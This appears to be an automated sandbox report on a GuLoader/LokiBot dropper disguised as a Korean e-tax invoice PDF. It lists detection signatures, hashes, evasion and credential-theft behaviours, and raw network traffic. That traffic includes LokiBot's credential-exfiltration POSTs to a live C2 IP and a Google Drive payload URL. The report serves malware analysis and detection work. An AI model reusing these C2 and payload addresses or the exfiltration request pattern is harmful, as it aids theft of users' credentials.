Windows Analysis Report NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe

Overview

General Information

Sample Name: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
Analysis ID: 532411
MD5: 9ff3b37069e0772af03732b022c02789
SHA1: ebaa34d6e69a4a33ad40ac64791b5f6366b7be9c
SHA256: 18b734b7b7da572d6ae29aedc5d0105e6b0ad96ba6c9bd100710b147d53f1a3b
Tags: exeLoki
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000009.00000000.787227598.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlf"}
Multi AV Scanner detection for submitted file
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Virustotal: Detection: 50% Perma Link
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe ReversingLabs: Detection: 53%
Antivirus detection for URL or domain
Source: http://63.250.34.171/tickets.php?id=156 Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://63.250.34.171/tickets.php?id=156 Virustotal: Detection: 8% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.97:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_00406873 FindFirstFileW,FindClose, 0_2_00406873
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C49
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49810 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49810 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49810 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49811 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49811 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49811 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 63.250.34.171:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=downlf
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 63.250.34.171 63.250.34.171
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3f39crtgptlkpn346psio1vva/1638430350000/13431600623523591888/*/1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-8g-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 163Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 07:33:46 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 07:33:50 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 07:33:53 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Form_Pilleorms8.exe, 00000009.00000003.867261601.0000000000830000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867343990.0000000000834000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Form_Pilleorms8.exe, 00000009.00000003.867261601.0000000000830000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867343990.0000000000834000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Form_Pilleorms8.exe, 00000009.00000002.898001784.000000001E5B3000.00000004.00000001.sdmp String found in binary or memory: https://doc-0s-8g-docs.googleusercontent.com/
Source: Form_Pilleorms8.exe, 00000009.00000003.867334806.0000000000839000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000003.868205288.0000000000836000.00000004.00000001.sdmp String found in binary or memory: https://doc-0s-8g-docs.googleusercontent.com/aF/T
Source: Form_Pilleorms8.exe, 00000009.00000003.867323522.0000000000834000.00000004.00000001.sdmp String found in binary or memory: https://doc-0s-8g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3
Source: Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N
Source: unknown HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3f39crtgptlkpn346psio1vva/1638430350000/13431600623523591888/*/1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-8g-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.97:443 -> 192.168.2.4:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: Form_Pilleorms8.exe, 00000001.00000002.787996138.00000000065BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004056DE

System Summary:

barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
Executable has a suspicious name (potential lure to open the executable)
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Static file information: Suspicious name
Uses 32bit PE files
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Detected potential crypto function
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_0040755C 0_2_0040755C
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_00406D85 0_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_081696A0 1_2_081696A0
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_081677A9 1_2_081677A9
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_081692DD 1_2_081692DD
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816EFE3 1_2_0816EFE3
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_08169B35 1_2_08169B35
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816DC4B 1_2_0816DC4B
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816D16C 1_2_0816D16C
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816D9B3 1_2_0816D9B3
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816EA76 NtProtectVirtualMemory, 1_2_0816EA76
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_081696A0 NtAllocateVirtualMemory, 1_2_081696A0
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_081677A9 NtWriteVirtualMemory, 1_2_081677A9
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816EFE3 NtMapViewOfSection, 1_2_0816EFE3
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FE51 Sleep,NtProtectVirtualMemory, 9_2_0056FE51
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FC9B LdrInitializeThunk,NtProtectVirtualMemory, 9_2_0056FC9B
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FCD3 LdrInitializeThunk,NtProtectVirtualMemory, 9_2_0056FCD3
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FEC7 Sleep,NtProtectVirtualMemory, 9_2_0056FEC7
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FDF3 NtProtectVirtualMemory, 9_2_0056FDF3
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FD7B NtProtectVirtualMemory, 9_2_0056FD7B
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FEE2 NtProtectVirtualMemory, 9_2_0056FEE2
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FC96 LdrInitializeThunk,NtProtectVirtualMemory, 9_2_0056FC96
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FD97 NtProtectVirtualMemory, 9_2_0056FD97
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FD15 LdrInitializeThunk,NtProtectVirtualMemory, 9_2_0056FD15
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FF91 NtProtectVirtualMemory, 9_2_0056FF91
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FF9D NtProtectVirtualMemory, 9_2_0056FF9D
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FDB9 NtProtectVirtualMemory, 9_2_0056FDB9
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_0056FD23 LdrInitializeThunk,NtProtectVirtualMemory, 9_2_0056FD23
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe, 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameForm_Pilleorms8.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDI
